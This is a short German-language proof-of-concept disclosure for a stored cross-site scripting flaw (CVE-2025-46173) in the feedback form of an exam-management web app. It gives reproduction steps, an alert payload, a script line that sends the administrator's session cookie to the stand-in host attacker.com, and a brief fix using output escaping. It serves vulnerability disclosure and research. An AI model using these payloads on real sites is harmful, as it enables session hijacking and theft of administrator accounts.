
PoC für die CVE-2025-46173
CVE-2025-46173 ist eine gespeicherte Cross-Site-Scripting- (XSS-)Schwachstelle, die im Online Exam Mastering System 1.0 von code-projects entdeckt wurde. Die Schwachstelle existiert in der Komponente feedback.php, wo Benutzereingaben im Namensfeld nicht ordnungsgemäß bereinigt werden, sodass ein Angreifer beliebiges JavaScript injizieren kann. Wenn ein Administrator dieses Feedback im Admin-Dashboard (dash.php) anzeigt, wird der Payload im Browser des Administrators ausgeführt, was zu Session-Hijacking und potenzieller Privilegieneskalation führt.
feedback.php, dash.phpEin Benutzer übermittelt den folgenden Payload im Feld Name des Feedback-Formulars:
<script>alert(document.cookie)</script>

Wenn der Administrator das übermittelte Feedback später in dash.php anzeigt, wird der Payload ausgeführt:

Das Session-Cookie des Administrators wird über document.cookie offengelegt und kann ausgelesen werden:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
Klonen oder richten Sie die verwundbare Version von code-projects ein.
Navigieren Sie zu localhost/exam/feedback.php.
Füllen Sie das Feld "Name" mit:
<script>alert(document.cookie)</script>
Senden Sie das Formular ab.
Melden Sie sich als Administrator an und besuchen Sie dash.php?q=3, um das Feedback anzusehen.
Das Skript wird im Kontext des Administrators ausgeführt.
&, <, >, ").htmlspecialchars() oder eine Kombination aus Frontend-Validierung und Backend-Bereinigung.Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
Screenshots dienen nur zu Bildungszwecken. Alle Tests wurden in einer lokalen Umgebung durchgeführt.
Klicken Sie hier, um das Demo-Video anzusehen
Diese Informationen werden ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie sie nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testberechtigung haben.